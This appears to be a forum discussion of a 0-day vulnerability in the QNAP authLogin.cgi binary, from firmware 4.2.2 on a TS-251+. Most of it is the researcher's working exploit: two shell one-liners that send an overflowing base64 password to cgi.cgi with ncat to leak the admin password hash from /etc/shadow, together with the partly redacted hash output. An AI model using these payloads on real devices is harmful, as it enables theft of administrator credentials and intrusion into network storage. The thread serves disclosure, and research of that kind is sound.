0-Day Critical Vulnerability In QNAP

For other's background information, bashis also uncovered the Axis critical security vulnerability.

For most of them, yes there is, but these lacking of some proper checkins.

The loops are only to easily get up to required chars to trigger things, instead of "manually type" +4000 chars. 

(It's actually one and same binary, but mentioned function are symlinked to the main binary (authLogin.cgi).

authLogout.cgi -> authLogin.cgi*
cgi.cgi -> authLogin.cgi*
jc.cgi -> authLogin.cgi*
language.cgi -> authLogin.cgi*
mediaGet.cgi -> authLogin.cgi*
qnapmsg.cgi -> authLogin.cgi*
sysinfoReq.cgi -> authLogin.cgi*

Below is also requests (base64 encoded) to retrieve the admin password (loaded in heap at address 0x0806ce56) that's loaded on heap from /etc/shadow.

Tested with my own device "QNAP TS-251+" and loaded with latest FW Version 4.2.2 (Build 20161214)

[HTTPS]
# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "B";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 192.168.5.7 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***
#

[HTTP]
#
echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "\xff";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\n\n" | ncat 192.168.5.7 8081 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***
#

#1, what do you think of QNAP's response?

internal investigations have shown that the vulnerability is not easily exploited

XXXXX=?????